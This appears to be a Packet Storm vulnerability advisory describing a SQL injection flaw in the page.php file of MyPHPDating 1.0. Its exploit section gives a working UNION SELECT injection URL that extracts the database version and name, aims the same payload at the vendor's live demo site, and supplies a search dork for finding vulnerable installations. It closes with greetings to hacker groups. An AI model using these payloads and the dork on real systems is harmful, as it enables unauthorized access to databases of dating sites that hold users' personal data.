MyPHPDating version 1.0 suffers from a remote SQL injection vulnerability in page.php.
f8304c08387bd44b9e6fd1896071663060732cb317cd1e45fe94f5e9db492ee0
=================================================================================================================================
[o] MyPHPDating 1.0 SQL Injection Vulnerability
Software : MyPHPDating version 1.0
Vendor : http://www.phponlinedatingsoftware.com/
Demo : http://www.phponlinedatingsoftware.com/demo.htm
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
=================================================================================================================================
[o] Description
MyPHPDating 1.0 is a full-featured version of our online dating / Matchmaking software.
It combines all the features of any standard online dating / Matchmaking website plus much more features,
that make your dating website very powerful and easy to use.
[o] Vulnerable file
page.php
[o] Exploit
http://localhost/[path]/page.php?page_id=[SQL]
http://localhost/[path]/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--
[o] Proof of concept [demo]
http://www.phponlinedatingsoftware.com/demo/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--
[o] Dork
"Powered by MyPHPDating"
=================================================================================================================================
[o] Greetz
MainHack BrotherHood [ http://serverisdown.org/news ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
=================================================================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed